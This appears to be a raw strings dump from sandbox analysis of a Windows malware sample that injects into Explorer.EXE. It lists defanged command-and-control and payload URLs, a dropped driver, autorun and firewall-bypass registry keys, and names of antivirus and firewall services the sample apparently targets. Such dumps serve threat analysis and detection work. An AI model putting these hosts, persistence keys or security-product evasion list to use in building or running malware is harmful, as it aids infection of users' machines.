C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe
hXXp://errors.clientstaticserv.com/utility.gif?action=installation&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&app=54246&srcid=001359&error=af&rnd=1413862412&result=
hXXp://errors.clientstaticserv.com/utility.gif?action=installation&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&app=54246&srcid=001359&error=af&rnd=1413862412&result=
3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852_rwx_003E0000_00002000:
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.text
.text
3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe_852_rwx_003F0000_00001000:
|3a2f274a-d35f-47ab-8ca2-11bebfe38097.exeM_852_
|3a2f274a-d35f-47ab-8ca2-11bebfe38097.exeM_852_
Explorer.EXE_1684_rwx_00EE0000_00002000:
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.text
.text
Explorer.EXE_1684_rwx_00EF0000_00001000:
|explorer.exeM_1684_
|explorer.exeM_1684_
Explorer.EXE_1684_rwx_038D0000_0108E000:
c:\windows
c:\windows
hXXp://cades.com.ar/images/logo.gif
hXXp://cades.com.ar/images/logo.gif
hXXp://ceviztv.com/images/logo.gif
hXXp://ceviztv.com/images/logo.gif
hXXp://thai-skylight.com/button.gif
hXXp://thai-skylight.com/button.gif
hXXp://coresdabahia.com/images/logo.gif
hXXp://coresdabahia.com/images/logo.gif
hXXp://smokin-tr.com/assets/images/logo.gif
hXXp://smokin-tr.com/assets/images/logo.gif
hXXp://VVV.buergerfest-graefenberg.de/logo.gif
hXXp://VVV.buergerfest-graefenberg.de/logo.gif
hXXp://wingmakershope.za.pl/images/button.gif
hXXp://wingmakershope.za.pl/images/button.gif
hXXp://wellssmall.com/images/logo.gif
hXXp://wellssmall.com/images/logo.gif
hXXp://VVV.uehsi.de/logo.gif
hXXp://VVV.uehsi.de/logo.gif
hXXp://hotelispb.hop.ru/image/logo.gif
hXXp://hotelispb.hop.ru/image/logo.gif
%System%\drivers\ijlqln.sys
%System%\drivers\ijlqln.sys
14067185087
14067185087
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.rsrc
.rsrc
.text
.text
hXXp://89.119.67.154/testo5/
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
hXXp://kukutrustnet987.info/home.gif
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
h.rdata
h.rdata
H.data
H.data
.reloc
.reloc
ntoskrnl.exe
ntoskrnl.exe
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728)
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
%s:*:Enabled:ipsec
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
GdiPlus.dll
hXXp://
hXXp://
ipfltdrv.sys
ipfltdrv.sys
VVV.microsoft.com
VVV.microsoft.com
?%x=%d
?%x=%d
&%x=%d
&%x=%d
SYSTEM.INI
SYSTEM.INI
USER32.DLL
USER32.DLL
.%c%s
.%c%s
\\.\amsint32
\\.\amsint32
NTDLL.DLL
NTDLL.DLL
autorun.inf
autorun.inf
ADVAPI32.DLL
ADVAPI32.DLL
win%s.exe
win%s.exe
%s.exe
%s.exe
WININET.DLL
WININET.DLL
InternetOpenUrlA
InternetOpenUrlA
avast! Web Scanner
avast! Web Scanner
Avira AntiVir Premium WebGuard
Avira AntiVir Premium WebGuard
cmdGuard
cmdGuard
cmdAgent
cmdAgent
Eset HTTP Server
Eset HTTP Server
ProtoPort Firewall service
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
SpIDer FS Monitor for Windows NT
Symantec Password Validation
Symantec Password Validation
WebrootDesktopFirewallDataService
WebrootDesktopFirewallDataService
WebrootFirewall
WebrootFirewall
%d%d.tmp
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
Explorer.exe
A2CMD.
A2CMD.
ASHWEBSV.
ASHWEBSV.
AVGCC.AVGCHSVX.
AVGCC.AVGCHSVX.
DRWEB
DRWEB
DWEBLLIO
DWEBLLIO
DWEBIO
DWEBIO
FSGUIEXE.
FSGUIEXE.
MCVSSHLD.
MCVSSHLD.
NPFMSG.
NPFMSG.
SYMSPORT.
SYMSPORT.
WEBSCANX.
WEBSCANX.
.adata
.adata
M_%d_
M_%d_
%c%d_%d
%c%d_%d
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryA
GetWindowsDirectoryA
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegCloseKey
RegCloseKey
SHFileOperationA
SHFileOperationA
&3&3&3&389
&3&3&3&389
.rdata
.rdata
.data
.data
Bkrnl.exe?
Bkrnl.exe?
= =$=(=,=
= =$=(=,=
322%2`.50728)
322%2`.50728)
.klkjw:9fqwi
.klkjw:9fqwi
FamXf39.sys
FamXf39.sys
.pBTa8
.pBTa8
%s:*:
%s:*:
Bg.laXV
Bg.laXV
&?%x=
&?%x=
GUrlA'
GUrlA'
Web%w|nc
Web%w|nc
HTTP)
HTTP)
2GUARDCMD.
2GUARDCMD.
.ENHCDM
.ENHCDM
PL/KPCKwWEB
PL/KPCKwWEB
MM.PFW.
MM.PFW.
.bssf
.bssf
J:CRT
J:CRT
ADVAPI32.dll
ADVAPI32.dll
MSVCRT.dll
MSVCRT.dll
SHELL32.dll
SHELL32.dll
WS2_32.dll
WS2_32.dll